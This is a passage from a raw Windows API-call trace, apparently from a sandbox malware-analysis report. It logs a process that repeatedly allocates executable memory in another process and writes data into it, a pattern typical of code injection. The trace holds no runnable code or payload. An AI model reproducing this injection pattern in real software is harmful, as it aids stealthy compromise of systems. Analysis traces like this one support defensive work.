Buffer=0x28de78*, NumberOfBytesRead=0x28de38*=0x48) returned 0x0 [0241.173] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de28*=0x0, ZeroBits=0x0, RegionSize=0x28de48*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de28*=0x1470000, RegionSize=0x28de48*=0x1000) returned 0x0 [0241.173] NtAllocateVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x28de08*=0x0, ZeroBits=0x0, RegionSize=0x28ddb8*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de08*=0xe0000, RegionSize=0x28ddb8*=0x1000) returned 0x0 [0241.173] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0xe0000, Buffer=0x1470000*, NumberOfBytesToWrite=0x30, NumberOfBytesWritten=0x28de10 | out: Buffer=0x1470000*, NumberOfBytesWritten=0x28de10*=0x30) returned 0x0 [0241.173] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x60000, Buffer=0x28de78*, NumberOfBytesToWrite=0x48, NumberOfBytesWritten=0x28de30 | out: Buffer=0x28de78*, NumberOfBytesWritten=0x28de30*=0x48) returned 0x0 [0241.173] NtClearEvent (EventHandle=0x144) returned 0x0 [0241.173] NtSignalAndWaitForSingleObject (SignalObject=0x140, WaitObject=0x144, Alertable=0, Time=0x0) returned 0x0 [0241.174] NtReadVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de40 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de40*=0x48) returned 0x0 [0241.174] NtFreeVirtualMemory (ProcessHandle=0x12c, BaseAddress=0x28de68*=0xe0000, RegionSize=0x28de58, FreeType=0x8000) returned 0x0 [0241.174] NtFreeVirtualMemory (ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de60*=0x1470000, RegionSize=0x28de50, FreeType=0x8000) returned 0x0 [0241.174] NtReadVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x20017, Buffer=0x28e008, NumberOfBytesToRead=0x8, NumberOfBytesRead=0x28df58 | out: Buffer=0x28e008*, NumberOfBytesRead=0x28df58*=0x8) returned 0x0 [0241.174] NtFreeVirtualMemory (ProcessHandle=0x12c, BaseAddress=0x28df98*=0x20000, RegionSize=0x28dfa0, FreeType=0x8000) returned 0x0 [0241.174] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x14002a370, Buffer=0x28e280*, NumberOfBytesToWrite=0x8, NumberOfBytesWritten=0x28e060 | out: Buffer=0x28e280*, NumberOfBytesWritten=0x28e060*=0x8) returned 0x0 [0241.174] NtAllocateVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x28df78*=0x0, ZeroBits=0x0, RegionSize=0x28dfa8*=0x1d, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28df78*=0x20000, RegionSize=0x28dfa8*=0x1000) returned 0x0 [0241.174] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x20010, Buffer=0x52ca4e*, NumberOfBytesToWrite=0x5, NumberOfBytesWritten=0x28df88 | out: Buffer=0x52ca4e*, NumberOfBytesWritten=0x28df88*=0x5) returned 0x0 [0241.175] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x20000, Buffer=0x28df68*, NumberOfBytesToWrite=0x10, NumberOfBytesWritten=0x28df80 | out: Buffer=0x28df68*, NumberOfBytesWritten=0x28df80*=0x10) returned 0x0 [0241.175] NtReadVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de38 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de38*=0x48) returned 0x0 [0241.175] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de28*=0x0, ZeroBits=0x0, RegionSize=0x28de48*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de28*=0x1470000, RegionSize=0x28de48*=0x1000) returned 0x0 [0241.175] NtAllocateVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x28de08*=0x0, ZeroBits=0x0, RegionSize=0x28ddb8*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de08*=0xe0000, RegionSize=0x28ddb8*=0x1000) returned 0x0 [0241.175] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0xe0000, Buffer=0x1470000*, NumberOfBytesToWrite=0x30, NumberOfBytesWritten=0x28de10 | out: Buffer=0x1470000*, NumberOfBytesWritten=0x28de10*=0x30) returned 0x0 [0241.175] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x60000, Buffer=0x28de78*, NumberOfBytesToWrite=0x48, NumberOfBytesWritten=0x28de30 | out: Buffer=0x28de78*, NumberOfBytesWritten=0x28de30*=0x48) returned 0x0 [0241.175] NtClearEvent (EventHandle=0x144) returned 0x0 [0241.175] NtSignalAndWaitForSingleObject (SignalObject=0x140, WaitObject=0x144, Alertable=0, Time=0x0) returned 0x0 [0241.176] NtReadVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de40 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de40*=0x48) returned 0x0 [0241.176] NtFreeVirtualMemory (ProcessHandle=0x12c, BaseAddress=0x28de68*=0xe0000, RegionSize=0x28de58, FreeType=0x8000) returned 0x0 [0241.176] NtFreeVirtualMemory (ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de60*=0x1470000, RegionSize=0x28de50, FreeType=0x8000) returned 0x0 [0241.176] NtReadVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x20015, Buffer=0x28e008, NumberOfBytesToRead=0x8, NumberOfBytesRead=0x28df58 | out: Buffer=0x28e008*, NumberOfBytesRead=0x28df58*=0x8) returned 0x0 [0241.176] NtFreeVirtualMemory (ProcessHandle=0x12c, BaseAddress=0x28df98*=0x20000, RegionSize=0x28dfa0, FreeType=0x8000) returned 0x0 [0241.176] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x14002a378, Buffer=0x28e280*, NumberOfBytesToWrite=0x8, NumberOfBytesWritten=0x28e060 | out: Buffer=0x28e280*, NumberOfBytesWritten=0x28e060*=0x8) returned 0x0 [0241.177] NtAllocateVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x28df78*=0x0, ZeroBits=0x0, RegionSize=0x28dfa8*=0x1f, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28df78*=0x20000, RegionSize=0x28dfa8*=0x1000) returned 0x0 [0241.177] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x20010, Buffer=0x52ca56*, NumberOfBytesToWrite=0x7, NumberOfBytesWritten=0x28df88 | out: Buffer=0x52ca56*, NumberOfBytesWritten=0x28df88*=0x7) returned 0x0 [0241.177] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x20000, Buffer=0x28df68*, NumberOfBytesToWrite=0x10, NumberOfBytesWritten=0x28df80 | out: Buffer=0x28df68*, NumberOfBytesWritten=0x28df80*=0x10) returned 0x0 [0241.177] NtReadVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de38 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de38*=0x48) returned 0x0 [0241.177] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de28*=0x0, ZeroBits=0x0, RegionSize=0x28de48*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de28*=0x1470000, RegionSize=0x28de48*=0x1000) returned 0x0 [0241.177] NtAllocateVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x28de08*=0x0, ZeroBits=0x0, RegionSize=0x28ddb8*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de08*=0xe0000, RegionSize=0x28ddb8*=0x1000) returned 0x0 [0241.177] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0xe0000, Buffer=0x1470000*, NumberOfBytesToWrite=0x30, NumberOfBytesWritten=0x28de10 | out: Buffer=0x1470000*, NumberOfBytesWritten=0x28de10*=0x30) returned 0x0 [0241.178] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x60000, Buffer=0x28de78*, NumberOfBytesToWrite=0x48, NumberOfBytesWritten=0x28de30 | out: Buffer=0x28de78*, NumberOfBytesWritten=0x28de30*=0x48) returned 0x0 [0241.178] NtClearEvent (EventHandle=0x144) returned 0x0 [0241.178] NtSignalAndWaitForSingleObject (SignalObject=0x140, WaitObject=0x144, Alertable=0, Time=0x0) returned 0x0 [0241.178] NtReadVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de40 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de40*=0x48) returned 0x0 [0241.178] NtFreeVirtualMemory (ProcessHandle=0x12c, BaseAddress=0x28de68*=0xe0000, RegionSize=0x28de58, FreeType=0x8000) returned 0x0 [0241.178] NtFreeVirtualMemory (ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de60*=0x1470000, RegionSize=0x28de50, FreeType=0x8000) returned 0x0 [0241.179] NtReadVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x20017, Buffer=0x28e008, NumberOfBytesToRead=0x8, NumberOfBytesRead=0x28df58 | out: Buffer=0x28e008*, NumberOfBytesRead=0x28df58*=0x8) returned 0x0 [0241.179] NtFreeVirtualMemory (ProcessHandle=0x12c, BaseAddress=0x28df98*=0x20000, RegionSize=0x28dfa0, FreeType=0x8000) returned 0x0 [0241.179] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x14002a380, Buffer=0x28e280*, NumberOfBytesToWrite=0x8, NumberOfBytesWritten=0x28e060 | out: Buffer=0x28e280*, NumberOfBytesWritten=0x28e060*=0x8) returned 0x0 [0241.179] NtAllocateVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x28df78*=0x0, ZeroBits=0x0, RegionSize=0x28dfa8*=0x1f, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28df78*=0x20000, RegionSize=0x28dfa8*=0x1000) returned 0x0 [0241.179] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x20010, Buffer=0x52ca60*, NumberOfBytesToWrite=0x7, NumberOfBytesWritten=0x28df88 | out: Buffer=0x52ca60*, NumberOfBytesWritten=0x28df88*=0x7) returned 0x0 [0241.179] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x20000, Buffer=0x28df68*, NumberOfBytesToWrite=0x10, NumberOfBytesWritten=0x28df80 | out: Buffer=0x28df68*, NumberOfBytesWritten=0x28df80*=0x10) returned 0x0 [0241.179] NtReadVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de38 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de38*=0x48) returned 0x0 [0241.179] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de28*=0x0, ZeroBits=0x0, RegionSize=0x28de48*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de28*=0x1470000, RegionSize=0x28de48*=0x1000) returned 0x0 [0241.180] NtAllocateVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x28de08*=0x0, ZeroBits=0x0, RegionSize=0x28ddb8*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de08*=0xe0000, RegionSize=0x28ddb8*=0x1000) returned 0x0 [0241.180] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0xe0000, Buffer=0x1470000*, NumberOfBytesToWrite=0x30, NumberOfBytesWritten=0x28de10 | out: Buffer=0x1470000*, NumberOfBytesWritten=0x28de10*=0x30) returned 0x0 [0241.180] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x60000, Buffer=0x28de78*, NumberOfBytesToWrite=0x48, NumberOfBytesWritten=0x28de30 | out: Buffer=0x28de78*, NumberOfBytesWritten=0x28de30*=0x48) returned 0x0 [0241.180] NtClearEvent (EventHandle=0x144) returned 0x0 [0241.180] NtSignalAndWaitForSingleObject (SignalObject=0x140, WaitObject=0x144, Alertable=0, Time=0x0) returned 0x0 [0241.180] NtReadVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de40 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de40*=0x48) returned 0x0 [0241.180] NtFreeVirtualMemory (ProcessHandle=0x12c, BaseAddress=0x28de68*=0xe0000, RegionSize=0x28de58, FreeType=0x8000) returned 0x0 [0241.181] NtFreeVirtualMemory (ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de60*=0x1470000, RegionSize=0x28de50, FreeType=0x8000) returned 0x0 [0241.181] NtReadVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x20017, Buffer=0x28e008, NumberOfBytesToRead=0x8, NumberOfBytesRead=0x28df58 | out: Buffer=0x28e008*, NumberOfBytesRead=0x28df58*=0x8) returned 0x0 [0241.181] NtFreeVirtualMemory (ProcessHandle=0x12c, BaseAddress=0x28df98*=0x20000, RegionSize=0x28dfa0, FreeType=0x8000) returned 0x0 [0241.181] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x14002a388, Buffer=0x28e280*, NumberOfBytesToWrite=0x8, NumberOfBytesWritten=0x28e060 | out: Buffer=0x28e280*, NumberOfBytesWritten=0x28e060*=0x8) returned 0x0 [0241.181] NtAllocateVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x28df78*=0x0, ZeroBits=0x0, RegionSize=0x28dfa8*=0x20, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28df78*=0x20000, RegionSize=0x28dfa8*=0x1000) returned 0x0 [0241.181] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x20010, Buffer=0x52ca6a*, NumberOfBytesToWrite=0x8, NumberOfBytesWritten=0x28df88 | out: Buffer=0x52ca6a*, NumberOfBytesWritten=0x28df88*=0x8) returned 0x0 [0241.181] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x20000, Buffer=0x28df68*, NumberOfBytesToWrite=0x10, NumberOfBytesWritten=0x28df80 | out: Buffer=0x28df68*, NumberOfBytesWritten=0x28df80*=0x10) returned 0x0 [0241.181] NtReadVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de38 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de38*=0x48) returned 0x0 [0241.182] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de28*=0x0, ZeroBits=0x0, RegionSize=0x28de48*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de28*=0x1470000, RegionSize=0x28de48*=0x1000) returned 0x0 [0241.182] NtAllocateVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x28de08*=0x0, ZeroBits=0x0, RegionSize=0x28ddb8*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de08*=0xe0000, RegionSize=0x28ddb8*=0x1000) returned 0x0 [0241.182] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0xe0000, Buffer=0x1470000*, NumberOfBytesToWrite=0x30, NumberOfBytesWritten=0x28de10 | out: Buffer=0x1470000*, NumberOfBytesWritten=0x28de10*=0x30) returned 0x0 [0241.182] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x60000, Buffer=0x28de78*, NumberOfBytesToWrite=0x48, NumberOfBytesWritten=0x28de30 | out: Buffer=0x28de78*, NumberOfBytesWritten=0x28de30*=0x48) returned 0x0 [0241.182] NtClearEvent (EventHandle=0x144) returned 0x0 [0241.182] NtSignalAndWaitForSingleObject (SignalObject=0x140, WaitObject=0x144, Alertable=0, Time=0x0) returned 0x0 [0241.183] NtReadVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de40 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de40*=0x48) returned 0x0 [0241.183] NtFreeVirtualMemory (ProcessHandle=0x12c, BaseAddress=0x28de68*=0xe0000, RegionSize=0x28de58, FreeType=0x8000) returned 0x0 [0241.183] NtFreeVirtualMemory (ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de60*=0x1470000, RegionSize=0x28de50, FreeType=0x8000) returned 0x0 [0241.183] NtReadVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x20018, Buffer=0x28e008, NumberOfBytesToRead=0x8, NumberOfBytesRead=0x28df58 | out: Buffer=0x28e008*, NumberOfBytesRead=0x28df58*=0x8) returned 0x0 [0241.183] NtFreeVirtualMemory (ProcessHandle=0x12c, BaseAddress=0x28df98*=0x20000, RegionSize=0x28dfa0, FreeType=0x8000) returned 0x0 [0241.183] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x14002a390, Buffer=0x28e280*, NumberOfBytesToWrite=0x8, NumberOfBytesWritten=0x28e060 | out: Buffer=0x28e280*, NumberOfBytesWritten=0x28e060*=0x8) returned 0x0 [0241.183] NtAllocateVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x28df78*=0x0, ZeroBits=0x0, RegionSize=0x28dfa8*=0x2b, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28df78*=0x20000, RegionSize=0x28dfa8*=0x1000) returned 0x0 [0241.183] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x20010, Buffer=0x52ca74*, NumberOfBytesToWrite=0x13, NumberOfBytesWritten=0x28df88 | out: Buffer=0x52ca74*, NumberOfBytesWritten=0x28df88*=0x13) returned 0x0 [0241.184] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x20000, Buffer=0x28df68*, NumberOfBytesToWrite=0x10, NumberOfBytesWritten=0x28df80 | out: Buffer=0x28df68*, NumberOfBytesWritten=0x28df80*=0x10) returned 0x0 [0241.184] NtReadVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de38 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de38*=0x48) returned 0x0 [0241.184] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de28*=0x0, ZeroBits=0x0, RegionSize=0x28de48*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de28*=0x1470000, RegionSize=0x28de48*=0x1000) returned 0x0 [0241.184] NtAllocateVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x28de08*=0x0, ZeroBits=0x0, RegionSize=0x28ddb8*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de08*=0xe0000, RegionSize=0x28ddb8*=0x1000) returned 0x0 [0241.184] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0xe0000, Buffer=0x1470000*, NumberOfBytesToWrite=0x30, NumberOfBytesWritten=0x28de10 | out: Buffer=0x1470000*, NumberOfBytesWritten=0x28de10*=0x30) returned 0x0 [0241.184] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x60000, Buffer=0x28de78*, NumberOfBytesToWrite=0x48, NumberOfBytesWritten=0x28de30 | out: Buffer=0x28de78*, NumberOfBytesWritten=0x28de30*=0x48) returned 0x0 [0241.184] NtClearEvent (EventHandle=0x144) returned 0x0 [0241.184] NtSignalAndWaitForSingleObject (SignalObject=0x140, WaitObject=0x144, Alertable=0, Time=0x0) returned 0x0 [0241.185] NtReadVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de40 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de40*=0x48) returned 0x0 [0241.185] NtFreeVirtualMemory (ProcessHandle=0x12c, BaseAddress=0x28de68*=0xe0000, RegionSize=0x28de58, FreeType=0x8000) returned 0x0 [0241.185] NtFreeVirtualMemory (ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de60*=0x1470000, RegionSize=0x28de50, FreeType=0x8000) returned 0x0 [0241.185] NtReadVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x20023, Buffer=0x28e008, NumberOfBytesToRead=0x8, NumberOfBytesRead=0x28df58 | out: Buffer=0x28e008*, NumberOfBytesRead=0x28df58*=0x8) returned 0x0 [0241.185] NtFreeVirtualMemory (ProcessHandle=0x12c, BaseAddress=0x28df98*=0x20000, RegionSize=0x28dfa0, FreeType=0x8000) returned 0x0 [0241.185] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x14002a398, Buffer=0x28e280*, NumberOfBytesToWrite=0x8, NumberOfBytesWritten=0x28e060 | out: Buffer=0x28e280*, NumberOfBytesWritten=0x28e060*=0x8) returned 0x0 [0241.185] NtAllocateVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x28df78*=0x0, ZeroBits=0x0, RegionSize=0x28dfa8*=0x2e, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28df78*=0x20000, RegionSize=0x28dfa8*=0x1000) returned 0x0 [0241.186] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x20010, Buffer=0x52ca8a*, NumberOfBytesToWrite=0x16, NumberOfBytesWritten=0x28df88 | out: Buffer=0x52ca8a*, NumberOfBytesWritten=0x28df88*=0x16) returned 0x0 [0241.186] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x20000, Buffer=0x28df68*, NumberOfBytesToWrite=0x10, NumberOfBytesWritten=0x28df80 | out: Buffer=0x28df68*, NumberOfBytesWritten=0x28df80*=0x10) returned 0x0 [0241.186] NtReadVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de38 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de38*=0x48) returned 0x0 [0241.186] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de28*=0x0, ZeroBits=0x0, RegionSize=0x28de48*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de28*=0x1470000, RegionSize=0x28de48*=0x1000) returned 0x0 [0241.186] NtAllocateVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x28de08*=0x0, ZeroBits=0x0, RegionSize=0x28ddb8*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de08*=0xe0000, RegionSize=0x28ddb8*=0x1000) returned 0x0 [0241.186] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0xe0000, Buffer=0x1470000*, NumberOfBytesToWrite=0x30, NumberOfBytesWritten=0x28de10 | out: Buffer=0x1470000*, NumberOfBytesWritten=0x28de10*=0x30) returned 0x0 [0241.187] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x60000, Buffer=0x28de78*, NumberOfBytesToWrite=0x48, NumberOfBytesWritten=0x28de30 | out: Buffer=0x28de78*, NumberOfBytesWritten=0x28de30*=0x48) returned 0x0 [0241.187] NtClearEvent (EventHandle=0x144) returned 0x0 [0241.187] NtSignalAndWaitForSingleObject (SignalObject=0x140, WaitObject=0x144, Alertable=0, Time=0x0) returned 0x0 [0241.187] NtReadVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de40 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de40*=0x48) returned 0x0 [0241.187] NtFreeVirtualMemory (ProcessHandle=0x12c, BaseAddress=0x28de68*=0xe0000, RegionSize=0x28de58, FreeType=0x8000) returned 0x0 [0241.187] NtFreeVirtualMemory (ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de60*=0x1470000, RegionSize=0x28de50, FreeType=0x8000) returned 0x0 [0241.187] NtReadVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x20026, Buffer=0x28e008, NumberOfBytesToRead=0x8, NumberOfBytesRead=0x28df58 | out: Buffer=0x28e008*, NumberOfBytesRead=0x28df58*=0x8) returned 0x0 [0241.187] NtFreeVirtualMemory (ProcessHandle=0x12c, BaseAddress=0x28df98*=0x20000, RegionSize=0x28dfa0, FreeType=0x8000) returned 0x0 [0241.188] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x14002a3a0, Buffer=0x28e280*, NumberOfBytesToWrite=0x8, NumberOfBytesWritten=0x28e060 | out: Buffer=0x28e280*, NumberOfBytesWritten=0x28e060*=0x8) returned 0x0 [0241.188] NtAllocateVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x28df78*=0x0, ZeroBits=0x0, RegionSize=0x28dfa8*=0x27, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28df78*=0x20000, RegionSize=0x28dfa8*=0x1000) returned 0x0 [0241.188] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x20010, Buffer=0x52c52e*, NumberOfBytesToWrite=0xf, NumberOfBytesWritten=0x28df88 | out: Buffer=0x52c52e*, NumberOfBytesWritten=0x28df88*=0xf) returned 0x0 [0241.188] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x20000, Buffer=0x28df68*, NumberOfBytesToWrite=0x10, NumberOfBytesWritten=0x28df80 | out: Buffer=0x28df68*, NumberOfBytesWritten=0x28df80*=0x10) returned 0x0 [0241.188] NtReadVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de38 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de38*=0x48) returned 0x0 [0241.188] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de28*=0x0, ZeroBits=0x0, RegionSize=0x28de48*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de28*=0x1470000, RegionSize=0x28de48*=0x1000) returned 0x0 [0241.188] NtAllocateVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x28de08*=0x0, ZeroBits=0x0, RegionSize=0x28ddb8*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de08*=0xe0000, RegionSize=0x28ddb8*=0x1000) returned 0x0 [0241.189] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0xe0000, Buffer=0x1470000*, NumberOfBytesToWrite=0x30, NumberOfBytesWritten=0x28de10 | out: Buffer=0x1470000*, NumberOfBytesWritten=0x28de10*=0x30) returned 0x0 [0241.189] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x60000, Buffer=0x28de78*, NumberOfBytesToWrite=0x48, NumberOfBytesWritten=0x28de30 | out: Buffer=0x28de78*, NumberOfBytesWritten=0x28de30*=0x48) returned 0x0 [0241.189] NtClearEvent (EventHandle=0x144) returned 0x0 [0241.189] NtSignalAndWaitForSingleObject (SignalObject=0x140, WaitObject=0x144, Alertable=0, Time=0x0) returned 0x0 [0241.189] NtReadVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de40 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de40*=0x48) returned 0x0 [0241.189] NtFreeVirtualMemory (ProcessHandle=0x12c, BaseAddress=0x28de68*=0xe0000, RegionSize=0x28de58, FreeType=0x8000) returned 0x0 [0241.189] NtFreeVirtualMemory (ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de60*=0x1470000, RegionSize=0x28de50, FreeType=0x8000) returned 0x0 [0241.190] NtReadVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x2001f, Buffer=0x28e008, NumberOfBytesToRead=0x8, NumberOfBytesRead=0x28df58 | out: Buffer=0x28e008*, NumberOfBytesRead=0x28df58*=0x8) returned 0x0 [0241.190] NtFreeVirtualMemory (ProcessHandle=0x12c, BaseAddress=0x28df98*=0x20000, RegionSize=0x28dfa0, FreeType=0x8000) returned 0x0 [0241.190] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x14002a3a8, Buffer=0x28e280*, NumberOfBytesToWrite=0x8, NumberOfBytesWritten=0x28e060 | out: Buffer=0x28e280*, NumberOfBytesWritten=0x28e060*=0x8) returned 0x0 [0241.190] NtAllocateVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x28df78*=0x0, ZeroBits=0x0, RegionSize=0x28dfa8*=0x23, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28df78*=0x20000, RegionSize=0x28dfa8*=0x1000) returned 0x0 [0241.190] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x20010, Buffer=0x52c514*, NumberOfBytesToWrite=0xb, NumberOfBytesWritten=0x28df88 | out: Buffer=0x52c514*, NumberOfBytesWritten=0x28df88*=0xb) returned 0x0 [0241.190] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x20000, 